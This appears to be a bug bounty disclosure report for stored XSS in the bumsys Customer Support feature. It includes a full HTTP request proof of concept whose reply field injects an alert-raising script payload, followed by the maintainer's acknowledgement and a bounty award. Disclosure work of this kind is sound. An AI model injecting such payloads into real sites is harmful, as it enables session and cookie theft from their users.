Stored XSS in Customer Support in unilogies/bumsys
Valid
Reported on
Feb 22nd 2023
Description
Attacker can send xss payload in Customer Support
Proof of Concept
Request Payload:
POST /xhr/?module=customer-support&page=addCaseReply HTTP/1.1
Host: demo.bumsys.org
Cookie: __80e72166c3164cd4e1f55b5348364ee4f8bc0d12=655mqrm2v9uhktlqpke0h026d4; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: bfbfb6c2834e8b91b86a883cd6c2b4cf18d8ad65
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3828905606458425251363531674
Content-Length: 570
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/customer-support/case-list/?case_id=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseReply"
<h1>test</h1><body onpageshow=alert(1)>
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="replyMode"
Public
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="case_id"
2
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseType"
Refund Request
-----------------------------3828905606458425251363531674--
Response:
HTML Injection and XSS alert
Impact
XSS vulnerability can allow attackers to steal cookies, create keylogger, change integrity of page and etc.
We are processing your report and will contact the
unilogies/bumsys
team within 24 hours.
3 months ago
@hatlesswizard, Good finding. We will fix the issue soon. Thank you
hatlesswizard
has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
to join this conversation